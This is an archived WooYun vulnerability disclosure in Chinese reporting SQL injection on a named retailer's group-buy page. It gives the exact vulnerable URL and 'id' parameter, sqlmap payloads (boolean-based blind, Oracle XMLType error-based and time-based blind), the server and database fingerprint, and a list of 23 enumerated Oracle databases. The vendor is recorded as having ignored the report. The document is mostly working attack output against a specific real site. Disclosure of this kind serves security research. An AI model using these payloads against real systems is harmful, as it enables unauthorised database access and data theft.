乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-12-26: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-02-09: 厂商已经主动忽略漏洞,细节向公众公开
江苏孩子王实业有限公司SQL注入
因为一个尿布,发现一个漏洞链接http://custom.haiziwang.com/tuangou/detail.htm?id=1713b7d20afe49d19932c9be6f78b0eaID是注入点
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1713b7d20afe49d19932c9be6f78b0ea' AND 6613=6613 AND 'DmBl'='DmBl Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: id=1713b7d20afe49d19932c9be6f78b0ea' AND 1050=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (1050=1050) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(100)||CHR(114)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'xXNA'='xXNA Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: id=1713b7d20afe49d19932c9be6f78b0ea' AND 7494=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'lQhP'='lQhP---web application technology: Apache 2.2.11, JSPback-end DBMS: Oracleavailable databases [23]:[*] BABY[*] CC[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_030000[*] FLOWS_FILES[*] JOINUS[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] RMAN[*] SCOTT[*] SHANJUN[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WK_TEST[*] WKSYS[*] WMSYS[*] XDB
未深入
见详细说明
你们更专业
未能联系到厂商或者厂商积极拒绝